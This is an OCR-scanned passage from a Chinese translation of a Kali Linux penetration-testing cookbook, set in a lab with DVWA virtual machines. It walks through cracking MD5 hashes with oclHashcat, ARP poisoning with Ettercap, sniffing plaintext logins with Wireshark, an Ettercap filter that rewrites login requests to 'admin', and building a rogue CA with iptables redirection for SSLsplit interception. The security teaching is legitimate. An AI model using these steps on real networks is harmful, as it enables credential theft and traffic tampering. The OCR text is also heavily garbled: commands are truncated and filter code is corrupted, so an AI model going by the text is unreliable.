Kali 默认 安装 的 oclHashcat 上 有 一 些 问题 ， 所 以 如 果 你 在 运行 oclHashcat 的 时 候 出 现 了 问 
题 ， 你 始终 可 以 从 官网 上 下 载 最 新 版 本 ， 并 从 从 Ce 


http://hashcat.net/ oclhashcat/ ) » 
REY HR 
我 们 首先 破解 单个 哈 希 ， 让 我 们 试 试 admin 的 哈 希 : 


oclhashcat -m 0 -a 3 21232f297a57a5a743894a0e4a801fc3 


IMFO: approaching final keyspace, workload adjuste: 


oc LHasheat 
Running 
irt sacret Mask Jitla 
ih Target.. 21232f 297 
sh.Typē..... .: MDS 
a, Started. DO secs 
.Es timated. oM secs 
GPU #l...: 11222.4 kH/s 
0/1 (0.00%) Digesta s, O/1 (0.00%) 
2892672/2892672 (100. 00%) 
. 0/2892672 (0. 00%) 
‘PU. #1...: O% Util, 65c Temp, 31% Fan 


232đf 297a57a5a743894a0e4aßg0lf c3: admin 





你 可 以 看 到 ， 我 们 能 够 直接 从 命令 行 中 设置 哈 希 ， 它 会 在 一 秒 之 内 破解 出 来 。 


2. 现在 ， 为 了 破解 整个 文件 ， 我 们 需要 去 掉 用 户 名 ， 只 保留 哈 布 ， 像 这 


hashes only & 7.txt 
21232f297a357a5a743894a0e4a3801 fc3 
eaggalsBdcáa78cb38d5f7508535/89727o03 
Bd3533d/5ae; SUOMI MEA TCCUSELUE 
GdlO/d3S9T5bbe4dD0cade3de5c71e93e9b/ 
Sfadr dcc3b5aa7 '65d61d832 7 deb8B2c T99 
eellcbbl9052e40b07aacOcaO060c23ee 


我 们 创建 了 只 包含 哈 希 的 新 文件 。 
3， 为 了 破解 文件 中 的 哈 希 ， 我 们 只 需要 在 上 一 条 命令 中 将 哈 希 替换 为 文件 名 称 。 


oclhashcat -m 0 -a 3 hashes only 6 7.txt 


oc LHashcat 
Running 
TOPAT: Mode.....: Mask (?1?272?27272?21?3)] 
| ,./hashes only. 6 7 


ash. Ti ..: MDS 
Tıme. Started...: Mon 0 26 00:14:09 2015 (2 


Time.Estimated.: Mon O 
Speed. GPU. #1...:; 


115 E. gE 5015 5360/ 
af y l 1 3796 015 as Á— i i G. 


Restore. Point.. : 1392640/ a SES (2. gm 
HwMon.GPU.£41...: 96% Util, BBC Temp, Sd4s Fan 





[sjtatus [pjause [r]esume lblypass lgqjuit 


它 在 三 分 钟 之 内 涵盖 了 一 到 七 个 字符 的 所 有 组 合 (每 秒 破解 6.885 亿 个 哈 
希 ) 。 并 且 它 需要 花费 多 于 两 个 小 时 来 测试 八 个 字符 的 所 有 组 合 。 这 对 于 爆破 来 说 十 分 


工作 原理 


在 这 个 秘籍 中 ， 我 们 用 于 执行 oclHahcat 的 参数 定义 了 要 使 用 的 哈 希 算法 -m o 告诉 程序 使 
用 MD5 来 计算 所 生成 单词 的 哈 希 ， 以 及 攻击 类 型 ， .a 3 的 意思 是 我 们 打算 使 用 纯 爆 破 攻 

击 ， 并 尝试 所 有 可 能 的 字符 组 合 ， 直 到 发 现 了 密码 。 最 后 ， 我 们 在 第 一 种 情况 中 添加 了 我 们 
打算 破解 的 哈 布 ， 第 二 种 情况 中 我 们 添加 了 包含 哈 布 集 合 的 文件 。 


oclHahcat 也 可 以 使 用 字典 文件 来 执行 混合 攻击 (爆破 加 上 字典 ) 来 定义 要 测试 哪个 字符 集 ， 
并 将 吉 果 保存 到 指 定 文 件 中 ( /usr/share/oclhashcat/oclHashcat.pot ) o 他 也 可 以 对 单词 应 
用 规则 ， 并 使 用 统计 模型 (马尔 科 夫 链 ) 来 增加 破解 效率 。 使 用 --help 命令 来 查看 所 有 选 
项 ， 像 这 样 


oclhashcat --help 


ANGE 中 间 人 攻击 


作者 : Gilberto Najera-Gutierrez 
译 者 : 飞龙 


协 仅 : CC BY-NC-SA 4.0 


简介 


中 间 人 (MTM) 攻击 是 一 种 攻击 类 型 ， 其 中 攻击 者 将 它 自己 放 到 两 方 之 间 ， 通 常 是 客户 端 和 
服务 端 通信 线路 的 中 间 。 这 可 以 通过 破坏 原始 频道 之 后 拦截 一 方 的 消息 并 将 它们 转发 (有 时 
会 有 改变 ) 给 另 一 方 来 实现 。 


让 我 们 观察 下 面 这 个 例子 : 





Alice 连接 到 了 Web 服务 器 上 ，Bob 打 算 了 解 Alice 正在 发 送 什么 。 于 是 Bob 建立 MITM 
攻击 ， 通 过 告诉 服务 器 他 是 Alice， 并 且 告 诉 Alice 他 是 服务 器 。 2k , ^ Alice 的 请 求 都 会 
发 给 Bob，Bob 会 将 它们 转发 给 服务 器 ， 并 对 服务 器 的 响应 做 相同 操作 。 这 样 ，Bob 就 能 够 
拦截 、 读 取 或 修改 所 有 Alice 和 服务 器 之 间 的 流量 。 


虽然 MITM 攻击 并 不 特定 与 Web 攻击 ， 了 解 如 何 执行 它们 ， 以 及 如 何 防止 它们 ， 对 于 任何 渗 
透 测 试 者 都 非常 重要 ， 因 为 它们 可 以 用 于 偷 取 密 码 ， 动 持 会 话 ， 或 者 执行 Web 应 用 中 的 非 授 
权 操 作 。 


一 章 中 ， 我 们 会 建立 起 中 间 人 攻击 ， 并 使 用 它 来 获得 信息 ， 以 及 执行 更 加 复杂 的 攻击 。 


8.1 使 用 Ettercap 467 3X J& 3 h 


地 址 解析 协议 (ARP) 坎 骗 可 能 是 最 常见 的 MTM 攻击 。 它 基于 一 个 事实 ， 就 是 ARP 并 不 验 
证 系统 所 收 到 的 响应 。 这 就 意味 着 ， 当 Alice 的 电脑 询问 网 络 上 的 所 有 设备 ，“|P 为 
XXX.XXX.XXX.XXX HJ PUZ aJ MAC 地 址 是 什么 ”时 ， 它 会 信任 从 任何 设备 得 到 的 答复 。 该 设备 可 


ANGE 中 间 人 攻击 


能 是 预期 的 服务 器 ， 也 可 能 是 不 是 。ARP 坎 骗 或 毒化 的 工作 方式 是 ， 发 送 大 量 ARP 响应 给 通 
信 的 两 端 ， 告诉 每 一 端 攻 击 者 的 MAC 地 址 对 应 它们 另 一 端的 IP 地 址 。 


及 


En) 


这 个 秘籍 中 ， 我 们 会 使 用 Ettercap 来 执行 ARP 坎 骗 攻击 ， 并 将 我 们 放 到 客户 端 和 服务 器 之 
间 。 


准备 


对 于 这 个 秘籍 ， 我 们 会 使 用 第 一 章 配 置 的 客户 端 虚 拟 机 ， 和 vulnerable_vm。 客户 端的 IP 是 
192.168.56.101，vulnerable vm x 192.168.56.102 » 


操作 步骤 


1， 将 两 个 虚拟 机 打开 ， 我 们 的 Kali Linux (192.168.56.1) 主机 是 攻击 者 的 机 器 。 打 开 终 端 
窗口 并 输入 下 列 命令 : 


ettercap -G 


从 Ettercap 的 主 菜单 中 ， 选 择 sniff | Unified Sniffing ° 


2. 在 弹出 的 对 话 框 中 选择 你 打算 使 用 的 网 络 接口 ， 这 里 我 们 选择 vboxneto ， 像 这 样 : 


ettercap Input 


9 
coe J or 





3， 既 然 我 们 噢 探 了 网 络 ， 下 一 步 就 是 识别 哪个 主机 正在 通信 。 访 问 主 菜单 的 Hosts 之 后 选 


择 Scan for hosts ? 


4， 从 我 们 发 现 的 主机 中 ， 选 择 我 们 的 目标 。 从 Hosts 菜单 栏 中 选择 Hosts list ° 
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P NX 中 间 人 攻击 





ettercap 0.8.2 eooo 
Start Targets Hosts View Mitm Filters Logging Plugins Info 
Host List x 
IP Address = MAC Address Description 
192.168.568.100: 08:00:27:58:2F:DC 
192.168,55.101. 08:00:27:3F:03:BC 
192,168,565.102: D8:00:27:3F: C5; CA 
| Delete Host J Add to Target 1 l Add to Target 2 | 


T T-— uw LL l l a -— nana ns Te 


Unified sniffing already started.. 

Randomizing 255 hosts for scanning... 

Scanning the whole netmask for 255 hosts... 

2 hosts added to the hosts list.. 

DHCP: [08:00:27:3F:03:BC] DISCOVER 

DHCP: [08:00:2 7:3F:03:BC] DISCOVER 

DHCP: [192,168,55.100] OFFER : 182.158.55,101 255.259.255.0 GW Invalid 
DHCP: [192,168,56.100] OFFER : 192.168.56.101 255.255.255.0 GW invalid 
DHCP: [08:00:27:3F:03:BC] REQUEST 192.168.55.101 

DHCP: [08:00:27:3F:03:BC] REQUEST 192.168.56.101 

DHCP: [192,.168,56.100] ACK : 192.168.56.101 255.255.255.0 GW invalid 
DHCP: [192,168,56.100] ACK : 1892.188.55,101 255.255.255.0 GW Irrvalld 
Randornizing 255 hasts for scanning... 

Scanning the whole netmask for 255 hosts... 

3 hosts added to the hosts list... 


5， 从 列表 中 选择 192.168.56.101 ， 并 点 击 Add to Target 1 ° 
6. 之 后 选择 192.168.56.102 ， 之 后 点 击 Add to Target 2 ° 
7. 现在 我 们 检查 目标 : 在 Targets 菜单 中 ， 选 择 Current targets ° 


Host List x Targets » | 


Target 1 Target 2 
192.158,56.101 192.158,56.102 


8. 我 们 现在 准备 好 了 开始 欺骗 攻击 ， 我 们 的 位 置 在 服务 器 和 客户 端 中 间 ， 在 mitm 菜单 中 ， 


选择 ARP poisoning ? 


O. 在 弹出 的 窗口 中 ， 选 中 sniff remote connections ， 然 后 点 击 ok 。 


MITM Attack: ARP Poisoning 





| Cancel T OK | 


这 就 结束 了 ， 我 们 现在 可 以 看 到 在 客户 端 和 服务 端 之 间 的 流量 。 





工作 原理 
在 我 们 键入 的 第 一 个 命令 中 ， 我 们 告诉 Ettercap 启动 GTK 界面 。 
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其 它 界 面 选项 为 -T 启动 文本 界面 ， -Cc 户 动 光标 (A ASCII XA) > op 运行 为 守护 进 
程 ， 没 有 界面 。 


之 后 ， 我 们 启动 了 Ettercap 的 嗅 探 功 能 。 统 一 模式 意味 着 dp 过 单一 网 络 接口 接受 并 发 
送信 息 。 当 我 们 的 目标 通过 不 同 网 络 接口 到 达 时 ， 我 们 选择 桥接 模式 。 例 如 ， 如 果 我 们 拥有 
两 个 网 卡 ， 并 且 通 过 其 一 连接 到 客户 端 ， 另 一 个 连 opti o 


在 嗅 探 开始 之 后 ， 我 们 选择 了 目标 。 
事先 选择 你 的 目标 


单 次 攻击 中 ， 选 择 唯 一 必要 主机 作为 目标 非常 重要 ， 因 为 毒化 攻击 会 生成 大 量 网 络 流 
量 ， 并 导致 所 有 主机 的 性 能 问题 。 在 开始 MTM 攻击 之 前 ， 弄 清楚 那 两 个 系统 会 成 为 目 
标 ， 并 仅仅 坎 骗 这 两 个 系 细 


一 旦 设置 了 目标 ， 我 们 就 可 以 开始 ARP 毒化 攻击 。 sniffing remote connections 意味 着 
Ettercap 会 捕获 和 读 取 所 有 两 端 之 间 的 封包 ， only poison one way 在 我 们 仅仅 打算 毒化 客户 
端 ， 而 并 不 打 萌 了 解 来 自 服 务 器 或 网 关 的 请 求 时 〈 或 者 它 拥有 任何 对 ARP 毒化 的 保护 时 ) 3E 
T xm 


8.2 使 用 Wireshark 执行 MITM 以 及 捕获 流量 


Ettercap 可 以 检测 到 经 过 它 传 播 的 相关 信息 ， 例 如 密码 。 但 是 ， 在 渗透 测试 的 时 候 ， 它 通常 

不 足以 拦截 一 些 整数 ， 我 们 可 能 要 寻找 其 他 信息 ， 类 似 信 用 卡 的 号 码 ， 社 会 安全 号 码 ， 名 

称 ， 图 片 或 者 文档 。 拥 有 一 个 可 以 监听 网 络 上 所 有 流量 的 工具 十 分 实用 ， 以 便 我 们 保存 和 之 
后 分 析 它 们 。 这 个 工具 是 个 噢 探 器 ， 最 符合 我 们 的 目的 的 工具 就 是 Wireshark， 它 包含 于 Kali 

Linux ° 


这 个 秘籍 中 ， 我 们 会 使 用 Wireshark 来 捕获 所 有 在 客户 端 和 服务 端 之 间 发 送 的 封包 来 获取 信 
É. O 


准备 

在 开始 之 前 我 们 需要 让 MITM 工作 。 

TRE 7 3 

1. AA. Kali Applications 菜单 的 sniffing & Spoofing 启动 Wireshark， 或 者 从 终端 中 执行 


wireshark 


2. 3 Wireshark 加 载 之 后 ， 选 项 你 打算 用 于 捕获 封包 的 网 卡 。 我 们 这 里 选择 vboxneto ， 像 
这 样 : 


ANGE 中 间 人 攻击 


Á Start 


Choose one or more interfaces to capture from, then Start 


|" wlanO 





| 区 


any 
3. 之 后 点 击 start 。 你 会 立即 看 到 Wireshark 正在 捕获 ARP 封包 ， 这 就 是 我 们 的 攻击 。 


'[](img/8-2-2.jpg) 


1. 现在 ， 来 到 客户 端 虚 拟 机 ， 浏 览 http://192.168.56.102/ dvwa ， 并 登陆 DVWA ° 


2. Æ Wireshark 中 的 info 区 域 中 ， 查 找 来 自 192.168.56.101 到 192.168.56.102 ^ # A 
POST /dvwa/login.php 的 HTTP 封包 。 


No. Time Sourca Destination Protocol Length Info 
25/7 25.95354300 192.168.56.101 192. 168. 56. 25 MENS S2 Name query MB WPAD=<00> 
258 25.95385000 192.158.55.101 182.158.56.255 NBNS 582 Name query NB WPAD<00> 
239 46.70447400 1582.168.56.101 182.168,.56.255 MENS S2 Name query MB WPAD«ÜD- 












250 26,/044BD00 152.168. 56.101 192. 168. 56. 255 MENS 9S2 Name query MB WPAD=<00= 


251 26.87109300 192.168.56.101 192. 168,56,.1€ HTTF 


263 26.89374400 192.168.56. 








265 26,89785500 182.158.56.101 









192.168.56.102 





HTTP 689 GET /dvwa/index.php HTTF 


— di. E uim 186 1&8 EE 12 1 1031 1&9 EE 151 0 Tr^ TTF enman aft s en 








| 
Bm em 








ozdo 48 50 53 45 53 53 49 44 3d 6c 62 6c 75 30 5e 63 HPSESSID zlbluünc 
|D2eO 31 &a 37 64 72 33 72 6e 30 65 6b 32 38 33 62 65 adegit Oek zg3be 
Fe "o 


O2fO 561 62 37 Od Oa Od Oa à 
gago | 
O310 | 


e*t Value (urlencoded-form.value), 5... Packets: 362 Displayed: 362 (100.0%) - Dr.., Profile: Default 









如 果 我 们 浏览 所 有 捕获 的 封包 ， 我 们 会 看 到 一 个 封包 对 应 授权 ， 并 会 看 到 我 们 可 以 以 纯 
文本 获得 用 户 名 和 密码 。 


使 用 过 滤器 


我 们 可 以 在 Wireshark 中 使 用 过 滤器 来 只 展示 我 们 感 兴趣 的 封包 。 例 如 ， 为 了 只 查 
看 登录 页 面 的 HTTP 请求， 我 们 可 以 使 用 : http. request.uri contains "login" ° 


如 果 我 们 查看 Ettercap 的 窗口 ， 我 们 也 能 看 到 用 户 名 和 密码 ， 像 这 样 : 


P poisoning victims: 


GROUP 1 : 192.168.565.101 08:00:2 7:3F:03:BC 


GROUP 2 : 182, 168,56.102 0B:00:2 /:3F; C5: C4 
HTTP : 182.168.55.102:B0 -> USER: admin PASS: admin INFO: http://192.168.56.102/dvwa/login.php 
CONTENT: username - adrmmin&password- admin&Login- Login 
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通过 捕获 客户 端 和 服务 端 之 间 的 流量 ， 攻 击 者 能 够 提取 和 利用 所 有 类 型 的 敏感 信息 ， 例 
WH PZ o RA Nn AE Cookie、 了 账户 号 码 、 信 用 卡号 码 、 私 人 邮件 ， 以 及 其 它 。 


工作 原理 


Wireshark 监听 每 个 我 们 选择 监听 的 接口 上 的 封包 ， 并 在 它 的 界面 中 显示 。 我 们 可 以 选择 监听 
多 个 接口 。 


当 我 们 首先 启动 嗅 探 的 时 候 ， 我 们 了 解 了 ARP 坎 骗 如 何 工 作 。 它 发 送 大 量 ARP 封包 给 客户 
端 和 服务 端 ， 以 便 防 止 它们 的 地 址 解析 表 (ARP 表 ) 从 正当 的 主机 获得 正确 的 值 。 


最 后 ， 当 我 们 向 服务 器 发 送 请 求 时 ， 我 们 看 到 了 Wireshark 如 何 捕获 所 有 和 包 a 
息 ， 包 含 协议 、 来 源 和 目的 地 1IP。 更 重要 的 是 ， 它 包含 了 由 客户 端 发 送 的 数据 ， 其 中 包 人 金管 


j 见 
研究 Wireshark 数据 有 一 些 无 聊 ， 所 以 了 解 如 何在 捕获 封包 时 使 用 显示 过 滤器 非常 重要 。 你 
可 以 访问 下 列 站 点 来 了 解 更 多 信息 。 


e https://www.wireshark.org/docs/wsug html chunked/ChWorkbDisplayFilterSection.html 
e https://wiki.wireshark.org/DisplayFilters 


使 用 Wireshark， 你 可 以 通过 捕获 过 滤器 来 选择 捕获 哪 种 数据 。 这 是 非常 实用 的 特性 ， 尤 其 是 
执行 MITM 攻 击 时 生成 大 量 流量 的 时 候 。 你 可 以 从 下 列 站 点 中 阅读 更 多 信息 。 


e https://www.wireshark.org/docs/wsug html chunked/ChCapCaptureFilterSection.html 
e https://wiki.wireshark.org/CaptureFilters 


8.3 修改 服务 端 和 客户 端 之 间 的 数据 


在 执行 MITM 攻击 时 ， 我 们 不 仅仅 能 够 监听 在 受害 者 系统 之 间 发 送 的 任何 数据 ， 也 能 够 修改 
请 求 和 响应 ， 因 而 按照 我 们 的 意图 调整 它们 的 行为 。 


这 个 秘籍 中 ， 我 们 会 使 用 Ettercap 过 滤器 来 检测 封包 包含 我 们 感 兴 趣 的 信息 ， 并 触发 改 
变 后 的 操作 。 


准备 
在 开始 之 前 我 们 需要 让 MITM 工作 。 


TRE 7 3 


1. 我 们 的 第 一 步 是 创建 过 滤器 文件 。 将 下 列 代码 保存 到 文本 文件 中 (我们 命名 
为 regex-replace-filter.filter ) 


4 If the packet goes to vulnerable vm on TCP port 80 (HTTP) 
if (ip.dst -- '192.168.56.102'&& tcp.dst -- 80) ( 
4 if the packet's data contains a login page 
if (search(DATA.data, "POST"))(1 
msg("POST request"); 
if (search(DATA.data, "login.php") H 
msg("Call to login page"); 
4 Will change content's length to prevent server from failing 


pcre regex(DATA.data, "Content-Length*N:* [0-9]*","Content-Length: 41") 


msg("Content Length modified"); 
4 will replace any username by "admin" using a regular expression 


if (pcre regex(DATA.data, "username-[a-zAZ]*&", "username-admin&" )) 
msg("DATA modified^n"); 


msg("Filter Ran.*n"); 


2. 下 面 我 们 需要 为 Ettercap 编译 过 滤器 来 使 用 它 。 从 终端 中 ， 执 行 下 列 命令 。 
etterfilter -o regex-replace-filter.ef regex-replace-filter.filter 


m nT =h rd N er 
m = rae ge AX 


etterfilter 0.8.2 copyright 2001-2015 Ettercap Development Team 


tocol tables loaded: 
DECODED DAIA udp tcp esp gre icmp ipw ip arp wifi fddi tr eth 
| constants loaded: 


VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP 


Parsing source file 'regqex ə-filter.filter 
SE F 


frr done. 


Unfolding the meta-tree +#77+#7+ done. 
Converting Labels to real offsets 


äace-filter.a 





encoded into 8 instructions. 


3. 现在 ， 从 Ettercap 的 菜单 中 ， 选 择 Filters | Load a filter ， 后 面 
Æ regexreplace-filter.ef ?’ 并 点 击 Open ? 


我 们 会 看 到 Ettercap 的 日 志 禄 口中 出 现 新 的 条 目 ， 表 明 新 的 过 滤器 已 经 加 载 了 。 


![(img/8-3-2.jpg 


4. 在 客户 端 中 ， 浏 览 http://192.168.56.102/dvwa/ 并 使 用 密码 admin 登陆 任意 用 户 ， 例 


如 : inexistentuser: admin ° 














Welcome to Damn Vulnerable Web App! 
Instructions | Damn vulnerable Web App (DVVA) is a PHP SGL web application that is damn vulnerabla. lts main gaats 
m MM are to be an aid for security proflasssonals La test their skills and tools in a legal enronment, halp web dev jelopers 
Setup | better understand (he processes of secunng web apphcations and aid teachers/students to teach/learn web 
application security in a class room environment 














Brute ris | WARNING! 


用 户 现在 登陆 为 管理 员 ， 并 且 攻 击 者 拥有 了 对 两 个 用 户 都 生效 的 密码 。) 


5， 如 果 我 们 检查 Ettercap 的 日 志 ， 我 们 可 以 看 到 我 们 编写 在 代码 中 的 消息 会 出 现在 这 里 ， 
像 这 和 
Content filters loaded from /root/regex-replace-filter.ef.., 
HTTP : 192.168.56.102:80 -> USER: inexistentuser PASS: admin INFO: http://192.168.56.102/dvwajlogin.php 
CONTENT: usernamezinexistentuser&passwordz admin&Login-z Login 
POST request 
Call to login page 
Content Length modihed 
DATA modified 


Filter Ran. 


工作 原理 


ARP 欺骗 攻击 是 更 加 复杂 的 攻击 的 开始 。 这 个 秘籍 中 ， 我 们 使 用 了 Ettercap 的 封包 过 滤 功 能 
来 识别 带 有 特定 内 容 的 封包 ， 并 修改 它 来 强制 让 用 户 以 管理 员 登 录 应 用 。 这 也 可 以 从 服务 端 
到 客户 端 来 完成 ， 可 以 用 来 通过 展示 一 些 伪 造 信息 来 欺骗 用 户 。 

我 们 的 第 一 步 是 创建 过 滤 脚 本 ， 它 首先 检查 被 分 析 的 封包 是 否 含 有 我 们 打算 改变 的 信息 ， 像 
这 样 : 


if (ip.dst == '192.168.56.102'&& tcp.dst == 80) ( 


如 果 目 标 IP X vulnerable vm 之 一 ， 且 TCP 端口 是 80 (RU HTTP 端口 号 ) ， 它 就 是 发 往 
我 们 打算 拦截 的 服务 器 的 请 求 。 


if (search(DATA.data, "POST"))( 
msg("POST request"); 
if (search(DATA.data, "login.php") ){ 


如 果 请 求 使 用 POST 方法 ， 且 去 往 login.php 页 面 ， 它 就 是 登录 尝试 ， 因 为 这 是 我 们 的 目标 
应 用 接收 登录 尝试 的 方式 。 


pcre regex(DATA.data, "Content-Length*N:*N [0-9]*", "Content-Length: 41"); 


我 们 使 用 正则 表达 式 来 获取 请 求 中 的 Content-Length 参数 ， 并 将 它 的 值 改 为 41， 这 是 我 们 发 
送 带 有 admin/admin 凭证 的 登录 封包 的 长 度 。 


if (pcre regex(DATA.data, "username-[a-zA-Z]*&", username-admin&"))41 
msg("DATA modified^in"); 


同样 ， 使 用 正则 表达 式 ， 我 们 在 请 求 中 查找 用 户 名 称 值 ， 并 将 它 痊 换 为 admin ° 
消息 ( msg ) 仅仅 用 于 跟踪 和 调试 目的 ， 可 以 被 从 脚本 中 忽略 。 


在 编写 完 脚本 之 后 ， 我 们 使 用 Ettercap 的 etterfilter 编译 他 ， 以 便 执行 它 。 之 后 ， 我 们 在 
Ettercap 中 加 载 它 ， 然 后 等 待 客户 端 连 接 。 


8.4 发 起 SSL MITM 攻击 


如 果 我 们 使 用 我 们 目前 的 方法 噢 探 HTTPS 会 话 ， 我 们 不 能 从 中 得 到 很 多 信息 ， 因 为 所 有 通信 
都 是 加 密 的 。 


为 了 拦截 、 读 取 和 修改 SSL 和 TLS 的 连接 ， 我 们 需要 做 一 系列 准备 步 又， 来 建立 我 们 的 SSL 
代理 。SSLsplit 的 仿 作 方式 是 使 用 两 个 证 书 ， 一 个 用 于 告诉 服务 器 这 是 客户 端 ， 以 便 它 可 以 
接收 和 解密 服务 器 的 响应 ， 另 一 个 告诉 客户 端 这 是 服务 器 。 对 于 第 二 个 人 证书， 如 果 我 们 打算 
代替 一 个 拥有 自己 的 域名 的 网 站 ， 并 且 它 的 证书 由 认证 中 心 (CA) 签发 ， 我 们 就 需要 让 CA 
为 我 们 签发 根 和 证书 ， 但 因为 我 们 是 攻击 者 ， 我 们 就 需要 上 自己 来 做 。 


这 个 秘籍 中 ， 我 们 会 配置 我 们 自己 的 CA， 以 及 一 些 IP 转发 规则 来 执行 SSL 中 间 人 攻击 。 


操作 步 又 
， 首先， 我 们 打算 在 Kali 上 创建 CA 私 钥 ， 所 以 在 root 终端 中 键入 下 列 命 
openssl genrsa -out certaauth.key 4096 
2. 现在 让 我 们 创建 一 个 使 用 这 个 密 钥 签名 的 证 书 : 


openssl req -new -x509 -days 365 -key certauth.key -out ca.crt 


3. 填充 所 需 信 息 (或 者 仅仅 对 每 个 字段 按 下 回 车 ) o 


4. 下面， 我 们 需要 开 尼 IP 转发 来 开启 系统 的 路 由 功能 (将 目标 不 是 本 地 主机 的 |P 包 转 发 
到 网 关 ) 


echo 1 » /proc/sys/net/ipv4/ip forwar 


5. 现在 我 们 打算 配置 会 泽 来 防止 转发 任何 东西 。 首 先 ， 让 我 们 检查 我 们 的 iptables 
my 


iptables -t nat -L 


: =‘# iptables -t nat -L 
Chain PREROUTING (policy ACCEPT) 
target prot opt source destination 
PREROUTING direct all anywhere anywhere 
PREROUTING_ZONES_SOURCE all -- anywhere 
PREROUTING ZONES all nywher: anywhere 


Chain INPUT (policy ACCEPT) 
target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 
target prot opt source destination 
OUTPUT direct all -- anywhere anywnere 


chain POSTROUTING (policy ACCEPT) 

target prot opt source destination 

POSTROUTING direct all -- anywhere anywhere 
POSTROUTING ZONES SOURCE all -- anywhere anywhere 
POSTROUTING ZONES all -- anywhere anywhere 


Chain OUTPUT direct (1 refe 

target prot opt source destination 
Chain POSTROUTING ZONES (1 references) 

target prot opt source destination 

POST public all -- anywhere anywhere [goto] 
POST public al -- anywhere anywhere [goto] 
POST public all -- anywhere anywhere [goto] 





6， 如 果 有 东西 ， 你 可 能 打算 备份 一 下 ， 因 为 我 们 会 刷新 它们 ， 如 下 : 


iptables -t nat -L > iptables.nat.bkp.txt 


7. 现在 让 我 们 刷新 整个 表 。 


iptables -t nat -F 


8. 之 后 我 们 建立 PREROUTING 规则 : 


iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --toports 8080 
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --toports 8443 
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工作 原理 


这 个 秘籍 中 ， 我 们 配置 了 Kali 主机 来 充当 CA， 这 意味 着 它 可 以 校 验 SSLsplit 使 用 的 证 书 。 
在 前 两 步 中 ， 我 们 仅仅 创建 了 私 铀 ， 和 使 用 私 钥 签名 的 证 书 。 


下 面 ， 我 们 建立 了 端口 转发 规则 。 我 们 首先 开启 了 转发 选项 ， 之 后 创建 了 iptables 规则 来 将 
80 端口 的 请 求 转发 到 443 (HTTP 到 HTTPS) 。 这 是 为 了 重 定 向 请 求 。 我 们 的 MTM 攻击 会 
拦截 SSLsplit， 便 于 它 使 用 一 个 证 书 来 解密 收 到 的 消息 、 处 理 它 ， 使 用 另 一 个 证 书 加 密 并 发 
送 到 目的 地 。 

j 见 

你 应 该 了 解 更 多 加 密 证 书 以 及 SSL 和 TLS 协议 ， 还 有 SSLsplit， 可 以 访问 这 里 : 


e https://en.wikipedia.org/wiki/Public key certificate 
e https://www.roe.ch/SSLsplit 
e https://en.wikipedia.org/wiki/Iptables 


© man iptables 


8.5 使 用 SSLsplit 获得 SSL 数据 


在 之 全 的 窗 案 中 ， 我 们 准备 了 环境 来 攻击 SSL/TLS 连接 。 而 这 个 秘籍 中 ， 我 们 会 使 用 


SSLsplit 来 完成 MITM 攻击 并 从 加 密 连 接 中 提取 信息 。 
准备 
我 们 需要 在 开始 秘籍 之 前 执行 ARP 欺骗 攻击 ， 并 成 功 完 成 了 上 一 个 秘籍 。 


TRE y HR 


1. 首先， 我 们 需要 创建 目录 ， 其 中 SSLsplit 在 里 面 存放 上 日志。 打开 终端 并 创建 两 个 目录 ， 
像 这 样 : 


mkdir /tmp/sslsplit 
mkdir /tmp/sslsplit/logdir 


2. 现在 ， 让 我 们 启动 SSLSplit : 


sslsplit -D -l connections.log -j /tmp/sslsplit -S logdir -k certauth.key -c ca.cr 
t ssl 0.0.0.0 8443 tcp 0.0.0.0 8080 


-& legdir - 
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3. 现在，SSLSplit 正在 运行 ，Windows 客户 端 和 vulnerable vm 之 间 存 在 MITM， 来 到 客 
户 端 并 访问 https://192.168.56.102/dvwa/ ° 


4. 浏览 器 会 要 求 确认 ， 因 为 我 们 的 CA 和 证 书 并 不 是 被 任何 浏览 器 官方 承认 的 。 设 置 例 外 并 
继续 。 


Machine View Devices Help 





WE Certificate Error: Navigation Blocked - Windows Internet Explorer | 一 十 部 [em 


K » Je |E] https//192.168.56.102/dvwa/lngin.php "| 村 | x (E Bing d 


ur Favorites po [2] uggested Sites * e| Web Slice Gallery Y 


49 Certificate Error. Navigation Blocked tu" E) - - dm ov Pager Safety Took* $- 





[71 Click here to close tnis weDpare. 


M Continue to this website (not recommended). 
*! More information 
5， 现 在 登录 DVWA ， 使 用 管理 员 用 户 和 密码 。 


6. 让 我 们 看 看 SSLSplit 中 发 生 了 什么 。 打 开 新 的 终端 并 检查 日 志 内 容 ， 在 我 们 为 SSLSplit 
创建 的 目录 中 


ls /tmp/sslsplit/logdir/ 
cat /tmp/sslsplit/logdir/* 


NIC LL 


W 
7 / Mod" J bt , 


: NICO 
"tb66E | 0. 66 a ew IE 6" ècht v6t6 69261 v6coz[ UL abeo 63! 二 ~ 


Accept: image/]peg, application/x-ms-application, image/gif, applicatior 
Referer: https://192.168.56,102/dvwa/login.php 

Accept-Language: en-US 

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 56.1; Trident/: 
Content-Type: application/x-www-form-urlencoded 

Accept-Encoding: gzip, deflate 

Host: 192. 168.536. 102 

Content-Length: 41 

Connection: Keep-Alive 

Cache-Control: no-cache 

Cookie: security=low; PHPSESSID-mB8511nS6p3aag91slanilo7u4 


Username=admin&password=admin&Log1in=LoginHTTP/1.1 302 F 
: Mön, 16 Nov 2015 23:29:30 GMT 
(ubuntu) mod mono/2.4.3 PHPZ/5.3.2-lubuntu4.5 with 





现在 ， 即 使 Ettercap 和 Wireshark A 8&& $1 Ze 9 2&4 ^. RATA AAAA SSLSplit 中 得 
看 通信 。 


工作 原理 


这 个 秘籍 中 ， 我 们 继续 SSL 连接 上 的 攻击 。 在 第 一 步 中 ， 我 们 创建 了 目录 ， 其 中 SSLSplit 会 
将 捕获 到 的 信息 存在 里 面 。 


第 二 部 就 是 使 用 下 列 命令 执行 SSLSplit : 
e D :这 是 在 讲台 运行 SSLSplit， 并 不 是 守护 进程 ， 并 带 有 详细 的 输出 。 
© -1 connections.log : 这 将 每 个 连接 的 记录 保存 到 当前 目 录 的 connections.log 中 


e -j /tmp/sslsplit : 这 用 于 建立 jail directory 目录 ， /tmp/sslsplit 会 作为 
root ( chroot ) 包含 SSLSplit 的 环境 。 


e -s logdir : 这 用 于 告诉 SSLSplit 将 内 容 日 志 (所 有 请 求 和 响应 ) 保存 到 logdir (在 
jail 目 录 中 ) ， 并 将 数据 保存 到 单独 的 文件 中 。 


